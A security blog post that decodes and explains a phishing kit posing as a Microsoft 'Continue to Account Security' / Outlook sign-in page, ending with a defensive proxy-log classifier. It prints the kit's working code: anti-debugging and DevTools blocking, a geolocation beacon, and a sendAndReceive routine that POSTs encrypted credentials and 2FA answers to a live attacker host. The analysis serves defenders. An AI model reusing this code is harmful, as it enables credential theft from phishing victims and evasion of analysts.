Let’s Click the Link 1.5

In the previous post I broke down what the phishing email flow looked like. In this post we are going to take some of the obfuscated code, decode it, and talk about what it does. Keep in mind, all of this happens because of one simple click of the link.

Note: As of this writing mailspring has disabled the redirect to the phishing URL, so we must go directly to the site.

The main phishing page, titled “Continue to Account Security” (CtAS), is full of LZString-compressed and Base64-encoded strings. So why not start at the top.

The variable ‘ma’ contains:

JYMwBAFAdghgbsA5jALgewE4DoDuBTAIwBMNg48MwAfKsHYKItHLAYxgBsOAFACxijoAttVr1GzLAH0ADv0FoRNMLATJ02AK4BnCgEFEeQVgasOmonm0QARACFNGGTYCULsAG8AsACgw/gP9xJhYONHYUYDQoMABeMBsYAjRNFAAuAg4BAGsbAG5fAF9fJlZNISMULBgiIgBRckEAGWBtFCMKW2y8AE8QqBsAGjAQTShWSOjIPEaUd28/ANHxyZiOCBnK+d9AwNZotrA4OLAAbR3dy48wbp6AYTRLNLAARgAmAGYwQsGLy8DrhMMBxnigMJo8MNbg8nmAABwAVm+v0W/wCgLBILAYIhw20vFA6Wx4MhN16MLwzwA7F8fn80Z4wECsTjSfjCaCSVDyY9KWAAGxU5H0tEY4Gc3FgdkgIms7n3XnUgAswtRDLFLK5UoJMolpOhirAVKRdLVoqZmL18op1LeyLAAHoHWA7piwABqMAACRF/2uFRQMCtYE4sq1BthNNVDPRYADQeJktDwYjfMF0ZjjPjKZ5sMR319/gAugUfIWwBg8ChHDE4FhtIo8BBgHEAHzlwIQACEwDYbuUm2MzIA0r13AAyccdgLd3vSlCiMCDqrz0c9CdTs3/WdYeOL5e7qswNcb6f+Heh/ezaocFAnsCTs9L6+puKxeK91PllylwLFMtqqAkDrMubieOWB4yJWswACJ4CAMCaLeEA/uWlbVhgMQIRwui/gE/6FKhPilOUlTVLUDSVC0bQdBgEAAOT7IIeAAB4oBUUCaPRwzLBMURQBsszbGqkHQZUcEIUhKAoXh/joTWIycLhRRESI8TYcpPgQLxqxgD0KHgWqHBVmABAnBpeCyUyBwLjIJwvAADA5Vm6CgACSzEYHAnDaWMfHRAZCxokxhwwCcMgUCAmBCAIrB4FgUDMDJ5aWAQmiIIYGBWXsNkVuFkXRbF8WJTgyVbv4QEQJQAC0IZgK2YB2ZOYBdgQwmZnGJystl/xmfE3VPsEkhhBE/FYJWMhZHFDG8CgKAyNoaROjgK24JwMUYFU+xCPRRFov+f7DI5DlEYRMlAA=

LZString.decompressFromBase64 turns that into:

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener("keydown", function (event) {
    function l(event) {
        const v = [
            { keyCode: 123 },
            { ctrl: true, keyCode: 85 },
            { ctrl: true, shift: true, keyCode: 73 },
            { ctrl: true, shift: true, keyCode: 67 },
            { ctrl: true, shift: true, keyCode: 74 },
            { ctrl: true, shift: true, keyCode: 75 },
            { ctrl: true, keyCode: 72 }, // Ctrl + H
            { meta: true, alt: true, keyCode: 73 },
            { meta: true, alt: true, keyCode: 67 },
            { meta: true, keyCode: 85 }
        ];

        return v.some(i =>
            (!i.ctrl || event.ctrlKey) &&
            (!i.shift || event.shiftKey) &&
            (!i.meta || event.metaKey) &&
            (!i.alt || event.altKey) &&
            event.keyCode === i.keyCode
        );
    }

    if (l(event)) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
m = false;
(function y() {
    let b = false;
    const p = 100;
    setInterval(function() {
        const a = performance.now();
        debugger;
        const r = performance.now();
        if (r - a > p && !b) {
            m = true;
            b = true;
            window.location.replace('https://www.walmart.com');
        }
    }, 100);
})();

If that looks familiar, it is because this is the code that checks for our ‘Dev Mode’, our hot-keys, and our right click. Read decoded, it does four things. The first if bails out to about:blank when it sees browser automation (navigator.webdriver), PhantomJS (callPhantom / _phantom), or a User-Agent containing “Burp”. The keydown handler swallows keyCode 123 (F12), Ctrl+U (view source), Ctrl+Shift+I, C, J and K (the DevTools, inspect and console shortcuts), Ctrl+H, and the Cmd+Option+I, Cmd+Option+C and Cmd+U equivalents on macOS. The contextmenu handler kills right-click. The last block runs every 100 ms and times a debugger statement: if getting past it takes longer than 100 ms, a debugger must be paused on it, so the page bounces us to a shopping website (hard-coded here as walmart.com rather than picked at random).

The next blob, held in the variable kx, is a rather large Base64 string that is AES encrypted:

Partial Code: kx = "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

In order to decrypt this blob we need three things: the ciphertext, the Initialization Vector (IV), and the key. Here is how we get them and decode this blob:

1.      Decode the Base64 into raw bytes (CyberChef will show them as hex).

2.      Split off the first 16 bytes and set them aside. Those first 16 bytes are our IV; everything after them is the ciphertext.

3.      In the code of the CtAS page, right under the kx variable, we have our key in Base64.

Now, with our powers combined…err…with that information, we can use CyberChef to decrypt this blob: the AES Decrypt operation with the key entered as Base64 and the IV as hex. CBC mode with PKCS#7 padding is the CryptoJS default, and is also what this kit's own encryptData function uses later on, so that is the mode to pick.

Partial Code
c = atob;
j = c(`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

Here we have another Base64 blob (j) that is only encoded, not encrypted, so let's decode the Base64:

Partial Code
<!DOCTYPE html>
<html lang="en">
<head>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://github.com/fent/randexp.js/releases/download/v0.4.3/randexp.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/lz-string/1.4.4/lz-string.min.js"></script>
    <link rel="stylesheet" href="/567vvPEab7nFY8919">
    <link rel="stylesheet" href="/xydiqyYLUD6JwarsYcd28">
    <link rel="preload" href="/GDSherpa-bold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <link rel="preload" href="/GDSherpa-bold.woff" as="font" type="font/woff" crossorigin="anonymous">
    <link rel="preload" href="/GDSherpa-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <link rel="preload" href="/GDSherpa-regular.woff" as="font" type="font/woff" crossorigin="anonymous">
    <link rel="preload" href="/GDSherpa-vf.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <link rel="preload" href="/GDSherpa-vf2.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="robots" content="none">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>​</title>
    
    <style>body { height: 100vh !important; width: 100vw !important; } body.startnew { background-color: #f2f2f2; background-image: url('/ijoBPrFo9f5Y4pPAi6TVLcEa6HhwZZsgQRpgyns57XE6nsdJHVODRPX7NuFmfhhmU3uERpGhzNZ3k88nosjPpiLHfXJSG1Jukzky1OlTOXV2yeWMJj9p7Qx3Sj3cicSAmK3DhVq7NecUurwiQrBwx660'); background-repeat: no-repeat,no-repeat; background-position: center center,center center; background-size: cover,cover; color: #1b1b1b; } input:-webkit-autofill, input:-webkit-autofill:hover, input:-webkit-autofill:focus, input:-webkit-autofill:active{ -webkit-box-shadow: 0 0 0 30px white inset !important; } .btn { margin: 0 0 0 auto; display: block; background-color: #0067b8; color: #fff; border: 2px solid #0067b8; /* padding: 5px 30px; */ padding: 5px 37px; font-size: 15px; cursor: pointer; } .btn:hover { background-color: #085998; } .firstlogo{ background-image: url("/ijpFz5Nez8rxfgvewCTwKLznLWuGBfopBdHpec3NLPyqrGBV784Joyelu6ZXOVqZeeab230"); background-size: 100% 100%; width: 108px; height: 24px; background-repeat: no-repeat; } .bannerlogo{ height: 24px; max-height: 36px; background-image: url("/ijpFz5Nez8rxfgvewCTwKLznLWuGBfopBdHpec3NLPyqrGBV784Joyelu6ZXOVqZeeab230"); background-size: 100% 100%; width: 108px; background-repeat: no-repeat; background-size: contain; }
    #TpBhsecrCi {
    display: none;
    }
    #goog-gt-tt,
    .goog-te-spinner-pos {
        display: none !important;
        visibility: hidden !important;
    }
    .goog-te-spinner-pos + div {
        display: none !important;
        height: 0 !important;
        overflow: hidden !important;
    }
    .goog-brand {
        display: none !important;
    }
    .VIpgJd-ZVi9od-aZ2wEe-wOHMyf {
        display: none !important;
    }
    
    .goog-te-banner-frame.skiptranslate,
    .goog-te-gadget-icon,
    .goog-logo-link,
    .goog-te-gadget,
    .goog-te-banner-frame {
    display: none !important;
    }
    
    .skiptranslate {
    display: none !important;
    }
    @font-face { font-family: 'gdsherpa'; font-weight: 700; src: url(/GDSherpa-bold.woff2) format('woff2'),url(/GDSherpa-bold.woff) format('woff'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 400; src: url(/GDSherpa-regular.woff2) format('woff2'),url(/GDSherpa-regular.woff) format('woff'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 1 999; src: url(/GDSherpa-vf.woff2) format('woff2'),url(/GDSherpa-vf.woff2) format('woff2-variations'); unicode-range: U+0-10FFFF; font-display: swap } @font-face { font-family: 'gdsherpa'; font-weight: 1 900; src: url(/GDSherpa-vf2.woff2) format('woff2'),url(/GDSherpa-vf2.woff2) format('woff2-variations'); unicode-range: U+0-10FFFF; font-display: swap }</style>
        <script>
    ma = "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";
    bo = LZString.decompressFromBase64(ma);
    it = 'e' + 'v' + 'a' + 'l';
    (0, globalThis[it])(bo);
    </script>
    <script>
    document.addEventListener('copy', function(event) {
    if (document.activeElement.tagName === 'INPUT' || 
        document.activeElement.tagName === 'TEXTAREA' || 
        document.activeElement.isContentEditable) {
        return;
    }
    event.preventDefault();
    var customWord = "k";
    event.clipboardData.setData('text/plain', customWord);
    });
    
    </script>
<!-- Stop chasing the money and start chasing the passion. -->
    <script>
document.getElementById('SvoAdVGfyq').remove();
document.getElementById('QnsiKOkrpi').setAttribute('class', "startnew");
document.getElementById('QnsiKOkrpi').removeAttribute('style');
document.getElementById('QnsiKOkrpi').removeAttribute('id');
document.getElementById('pewmrVZUJA').remove();
var w = document.currentScript;
w.parentNode.removeChild(w);
</script>
</head>

<body class="startnew">
<!-- Success is not how high you have climbed, but how you make a positive difference to the world. -->
<div id="TpBhsecrCi"></div>
<!-- Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->
<div id="sections" class="">
    
<!-- <div>Success is where preparation and opportunity meet.</div> -->
    
<!-- <div>Innovation distinguishes between a leader and a follower.</div> -->
    
    
    <section id="section_tryingtosignin" style="animation:show-from-right 0.5s;" class="">
        <div class="auth-wrapper">
<!-- <div>Don't be afraid to give up the good to go for the great.</div> -->
            <div class="loading-container loading">
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
<!-- <div>Success is not the key to happiness. Happiness is the key to success.</div> -->
                <div class="dot-floating"></div>
<!-- Don't be afraid to give up the good to go for the great. -->
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
            </div>
<!-- Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. -->
            <div class="sectioncontent">
            <div class="firstlogo"></div>
            <h2 class="title mb-16 mt-16">Trying to sign you in</h2>
            <div class="bottomsection">
<!-- Try not to become a man of success. Rather become a man of value. -->
            <a href="javascript:void(0)">Cancel</a>
<!-- <div>Success is finding satisfaction in giving a little more than you take.</div> -->
            </div>
            <!-- <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p> -->
            </div>
<!-- Success is not the absence of failure; it's the persistence through failure. -->
        </div>
    </section>
<!-- Success is not the absence of failure; it's the persistence through failure. -->

    <section id="section_uname" class="d-none">
            <div class="out2-back-holder" id="out2-logo" style="display:none;">
        <img class="out2-back" src="/bcoQRApzb877WdWUk82nzO5hLiY2s0Jg9ql2adAUuazYKdomKlJhkZG6xXZc8UKdn45bDzVJRyBDsc8HGsvvWy72G8VFix8E8nG9UBuzQdN3VNmSLvop661">
    </div>
<!-- Success is not final, failure is not fatal: It is the courage to continue that counts. -->
        <div class="auth-wrapper">
            <div class="loading-container">
<!-- <div>Don't be afraid to give up the good to go for the great.</div> -->
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
<!-- <div>Never give in except to convictions of honor and good sense.</div> -->
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
                <div class="dot-floating"></div>
            </div>
<!-- Success usually comes to those who are too busy to be looking for it. -->
            <div class="sectioncontent">
            <div class="firstlogo"></div>
            
            
<!-- Success is how high you bounce when you hit bottom. -->
            <button class="back" onclick="backbtn()" style="display: none">
                <img src="/wx9kzoGEqx5MmemWgPnstlt3bVnwYcdF2vzUHoK6f12126"/>
            </button>
            <h2 class="title mt-16">Sign in</h2>
<!-- The starting point of all achievement is desire. -->
<p class="subtitle mb-16">to continue to Outlook</p>
                <div class="mb-16">
                    <div id="error_uname" class="error"></div>
<!-- Success usually comes to those who are too busy to be looking for it. -->
                    <input id="inp_uname" type="text" name="uname" class="input" autocomplete="off" oninput="removespaces(this)" value="" placeholder="Email, phone, or Skype" />
<!-- <div>Success is how high you bounce when you hit bottom.</div> -->
                </div>
            <div class="bottomsection"><p class="mb-16">No account? <a href="javascript:void(0)" data-id="signup" onclick="linkoptionclick(this)" class="link">Create one!</a></p><a class="link mb-16" data-id="cantAccessAccount" onclick="linkoptionclick(this)" href="javascript:void(0)">Can't access your account?</a></div>
<!-- <div>Success is not in what you have, but who you are.</div> -->
            <!-- <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p> -->
            <button class="btn" id="btn_next">Next</button>
            </div>
<!-- <div>Success is how high you bounce when you hit bottom.</div> -->
        </div>
        <div class="opts">
<p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="/qrFb4ust6sG3HzO9K5GtI0tghoY61mdzCYfBJCQKfFFTc267140" width="30px" /></span> Sign-in options</p>
<!-- <div>All our dreams can come true if we have the courage to pursue them.</div> -->
</div>
<!-- <div>Success is not in what you have, but who you are.</div> -->
    </section>

This appears to be the main HTML of our phishing page. The head pulls in the whole toolkit the rest of the page relies on (jQuery, randexp.js, CryptoJS and lz-string) from public CDNs, and then brings up the ma blob again. It decompresses it and runs it through an eval whose name is spelled out as 'e' + 'v' + 'a' + 'l' and looked up on globalThis, so the word never appears in the source. In other words, the anti-debug maneuvers do not only run before the page fully loads; they run again once the page is loaded.

Moving through the code we see various kibbles and bits that clearly indicate this site is trying to trick your user: a robots meta tag set to none so search engines and crawlers leave the page alone, a copy handler that replaces anything copied from outside an input box with the single letter 'k', a script that deletes itself and its helper elements from the DOM as soon as it has run, a Microsoft-styled 'Sign in' / 'to continue to Outlook' form hidden behind a 'Trying to sign you in' spinner, and motivational-quote HTML comments scattered through the markup. Please see the previous post for snippets.

As we continue through the code we come across another large piece of Base64, stored in a variable named wg:

Partial Code:
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

This blob is encrypted, so we use the same method as before (IV in the first 16 bytes, key from the page) to decrypt it:

var otherweburl = "";
var websitenames = ["godaddy", "okta"];
var bes = ["Apple.com","Netflix.com"];
var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me","Telegram"];
var capnum = 1;
var appnum = 1;
var pvn = 0;
var view = "";
var pagelinkval = "pqReX8";
var emailcheck = "0";
var webname = "rtrim(/web9/, '/')";
var urlo = "/kibkDCHlihnaL7S65NxNxUJHez730wl2Efqu3p6tuH7vh";
var gdf = "/ijAkraNBxpxsjxUN4vxpTV2ZOyzLXrIKObUZ98c2cd120";
var odf = "/ghFfNTeJLDUwCfdCuvhWeTb5JNx3Eab645";
var twa = 0;

var currentreq = null;
var requestsent = false;
var pagedata = "";
var redirecturl = "https://login.microsoftonline.com/common/SAS/ProcessAuth";
var userAgent = navigator.userAgent;
var browserName;
var userip;
var usercountry;
var errorcodeexecuted = false;
if(userAgent.match(/edg/i)){
    browserName = "Edge";
} else if(userAgent.match(/chrome|chromium|crios/i)){
    browserName = "chrome";
} else if(userAgent.match(/firefox|fxios/i)){
    browserName = "firefox";
} else if(userAgent.match(/safari/i)){
    browserName = "safari";
} else if(userAgent.match(/opr\//i)){
    browserName = "opera";
} else{
    browserName="No browser detection";
}

function removespaces(input) {
    input.value = input.value.replace(/\s+/g, ''); // Removes all spaces
}

//
    function sendlive(statusval) {
        $.ajax({
            type: "POST",
            url: urlo,
            data: stringToBinary(encryptData(JSON.stringify({
                pagelink: pagelinkval,
                type: statusval,
                ip: userip,
                country: usercountry,
                useragent: userAgent,
                appnum: appnum
            }))),
            success: function(response) {
            },
            error: function(xhr, status, error) {
                console.error("Error:", error);
            }
        });
    }

    $.get("https://get.geojs.io/v1/ip/geo.json", function(response) {
        userip = response.ip;
        usercountry = response.country;
        sendlive(13);
    }, "json").fail(function(jqXHR, textStatus, errorThrown) {
        if (jqXHR.status === 429 || textStatus !== "success") {
            setTimeout(sendemailrequestzero, 1000);
        }
    });
//

function encryptData(data) {
    const key = CryptoJS.enc.Utf8.parse('1234567890123456');
    const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
    const encrypted = CryptoJS.AES.encrypt(data, key, {
        iv: iv,
        padding: CryptoJS.pad.Pkcs7,
        mode: CryptoJS.mode.CBC
    });
    return encrypted.toString();
}

function stringToBinary(input) {
    const zeroReplacement = '0';
    const oneReplacement = '1';
  
    return btoa(input
      .split('')
      .map(char => {
        let binary = char.charCodeAt(0).toString(2);
        binary = binary.padStart(8, '0');
        return binary
          .split('')
          .map(bit => (bit === '0' ? zeroReplacement : oneReplacement))
          .join('');
      })
      .join(' '));
}

function decryptData(encryptedData) {
    const key = CryptoJS.enc.Utf8.parse('1234567890123456');
    const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
    const decrypted = CryptoJS.AES.decrypt(encryptedData, key, {
        iv: iv,
        padding: CryptoJS.pad.Pkcs7,
        mode: CryptoJS.mode.CBC
    });
    return decrypted.toString(CryptoJS.enc.Utf8);
}

var sendAndReceive = (route, args, getresponse) => {
if(requestsent == true && route !== "twofaselect"){
return new Promise((resolve, reject) => {
return resolve({message: "waiting for previous request to complete"});
});
}
if(requestsent == false || route == "twofaselect"){
requestsent = true;
let routename = null;
let randpattern = null;
if(route == "checkemail"){
randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;
}
if(route == "checkpass"){
randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;
}
if(route == "twofaselect"){
randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;
}
if(route == "twofaselected"){
randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;
if(currentreq){
currentreq.abort();
}
}
let randexp = new RandExp(randpattern);
let randroute = randexp.gen();

let formattedargs = 0;
if(route == "checkemail"){
formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;
}
if(route !== "checkemail"){
formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;
}
// console.log(formattedargs);
let encrypteddata = encryptData(formattedargs);
const makeRequest = (retryCount) => {
    return new Promise((resolve, reject) => {
            currentreq = $.ajax({
                url: 'https://AhGr3mWzw1EWkt9xG8DZBBJpEW3E5HrvQT6lhADRCoIyxvdGXMtSv2jIhdYe.lukztij.es/40174252504154927KiWDbOseTBOKWTZLXVRWSAJGQYGHIRJLZNAZBOGPYVYWE' + randroute,
                type: 'POST',
                data: {data: encrypteddata},
                success: function(response) {
                    if (response.message == "Token Not Found" && retryCount < 3) {
                    console.log('data: '+formattedargs);
                    setTimeout(function(){
                    resolve(makeRequest(retryCount + 1));
                    }, 3000);
                    }
                    if (response.message == "Missing Value") {
                    resolve('missing value');
                    }
                    if (response.message !== "Token Not Found") {
                    let decryptedresp = JSON.parse(decryptData(response));
                    if(route !== "twofaselected"){
                    if (decryptedresp.token) {
                        token = decryptedresp.token;
                    }
                    }
                    if (decryptedresp.message == "Token Not Found" && retryCount < 3) {
                        console.log('data: '+formattedargs);
                        setTimeout(function(){
                        resolve(makeRequest(retryCount + 1));
                        }, 3000);
                    } else {
                        // console.log(decryptedresp);
                        requestsent = false;
                        resolve(decryptedresp);
                    }
                    }
                },
                error: function(xhr, status, error) {
                    requestsent = false;
                    console.error('Error:', error);
                    reject(error);
                }
            });
        });
    };
    return makeRequest(0);
}
};
document.getElementById('sections_pdf').querySelector('#mainLoader').style.display = "none";
document.getElementById('sections_pdf').querySelector('#section_uname_content').classList.remove('d-none');
}, 1000);
}

if (document.getElementById('sections_doc')){
setTimeout(function(){
document.title = "Continue To Account Security";
}, 1000);
}

}, 1000);
}
if(twa == 1){
document.getElementById('section_tryingtosignin').querySelector('.loading-container').classList.remove('loading');
document.getElementById("section_tryingtosignin").classList.toggle('d-none');
document.title = "Continue To Account Security";
document.getElementById('section_uname').classList.remove('d-none');
}
if(twa == 2){
document.title = "Continue To Account Security";
}
// });

In the function sendlive we see that tracking information is gathered and then sent via a POST request to urlo, a path on the phishing host: the browser User-Agent, the victim's public IP, and the country that IP maps to, along with the page link ID, a 'type' value (13 when the page loads) and an app number. The IP and country do not come from the browser itself; the page fetches them from a third-party geolocation service (get.geojs.io) and only then fires the beacon.

This information is the data field of the AJAX call. Both a key and an IV are then created (separately, but from the same sixteen characters) using:

 CryptoJS.enc.Utf8.parse('1234567890123456');

That yields a 16-byte key, so this is AES-128 in CBC mode with PKCS#7 padding, and it is used to encrypt the data. Likely this is to keep the data you put in the phishing page, and the information gathered on you, from appearing in plain text on the wire. It is obfuscation rather than real confidentiality, though: the key and IV are hard-coded in client-side script, so anyone with the page source can decrypt what was sent, and a fixed IV means identical plaintexts produce identical ciphertexts. The stringToBinary function then turns each character of the Base64 ciphertext into an eight-digit string of 0s and 1s, joins those with spaces, and Base64-encodes the result a second time before it goes into the request body.

Keep in mind, this is not happening in a vacuum. This is what happens to your data when you submit it to a phishing site, and in reality the first beacon goes out BEFORE YOU EVEN SUBMIT ANY INFORMATION. This is why we don't want our users to click the link: nuggets of information are sent to the attacker just by having the page load. The credentials and 2FA answers themselves go through sendAndReceive, which POSTs the AES-encrypted form data to a second attacker endpoint. Note that the path is not fixed: every request appends a random suffix that RandExp generates from one of four regular expressions (one per route: checkemail, checkpass, twofaselect, twofaselected), so block on the host rather than on a full URL. For this phishing excursion, here is that attacker endpoint:

hxxps[://]AhGr3mWzw1EWkt9xG8DZBBJpEW3E5HrvQT6lhADRCoIyxvdGXMtSv2jIhdYe[.]lukztij[.]es/40174252504154927KiWDbOseTBOKWTZLXVRWSAJGQYGHIRJLZNAZBOGPYVYWE
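The route patterns from sendAndReceive double as a detection, which the following added example (not from the post or the kit) shows: anchored at both ends, the same four regular expressions that RandExp generates paths from will classify a path seen in a proxy log, telling you whether a victim only hit the email check or got all the way to the 2FA prompt. The log lines and the phish.example host are constructed; the base path is the one from the page.

```javascript
// Added example: classify kit request paths from proxy logs by the route that generated them.

// Copied from the kit's sendAndReceive, anchored so they match instead of generate. The first
// group of each pattern is disjoint from the others, so a path matches at most one route.
const KIT_BASE_PATH = '/40174252504154927KiWDbOseTBOKWTZLXVRWSAJGQYGHIRJLZNAZBOGPYVYWE';
const KIT_ROUTES = {
  checkemail:    /^(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)$/,
  checkpass:     /^(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)$/,
  twofaselect:   /^(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)$/,
  twofaselected: /^(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)$/,
};

// null: not a kit path at all; 'unknown': kit base path with a suffix no route explains.
function classifyKitPath(urlPath) {
  if (!urlPath.startsWith(KIT_BASE_PATH)) return null;
  const suffix = urlPath.slice(KIT_BASE_PATH.length).split('?')[0];
  for (const [route, re] of Object.entries(KIT_ROUTES)) if (re.test(suffix)) return route;
  return 'unknown';
}

// Constructed proxy log lines, "<timestamp> <client> <method> <url>"; not real traffic.
// The suffixes were written by hand to satisfy one pattern each.
const SAMPLE_LOG = [
  '2024-01-01T10:00:01Z 10.0.0.5 GET https://phish.example/pqReX8',
  '2024-01-01T10:00:04Z 10.0.0.5 POST https://phish.example' + KIT_BASE_PATH + 'pqABCDEF12xyzuv35',
  '2024-01-01T10:00:19Z 10.0.0.5 POST https://phish.example' + KIT_BASE_PATH + 'yzABCDEFG56abcop47',
  '2024-01-01T10:00:31Z 10.0.0.5 POST https://phish.example' + KIT_BASE_PATH + '56ABCDEFGH23abcdst55',
  '2024-01-01T10:01:02Z 10.0.0.5 POST https://phish.example' + KIT_BASE_PATH + '23ABCDEFGHI89abcdevw66',
].join('\n');

// Per client, the ordered list of kit stages seen: how far each victim got.
function stagesPerClient(logText) {
  const out = {};
  for (const line of logText.split('\n')) {
    const [, client, , url] = line.split(' ');
    const route = classifyKitPath(new URL(url).pathname);
    if (route) (out[client] = out[client] || []).push(route);
  }
  return out;
}

console.log(stagesPerClient(SAMPLE_LOG));  // { '10.0.0.5': [ 'checkemail', 'checkpass', 'twofaselect', 'twofaselected' ] }
```

A client that reaches twofaselected has handed over a password and answered a 2FA prompt, which is the case to escalate first; one that stops at checkemail only typed an address.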

If you have made it this far, thank you for reading. Leave a comment and let me know your thoughts. I am trying to get better, which comes with learning something new every day.
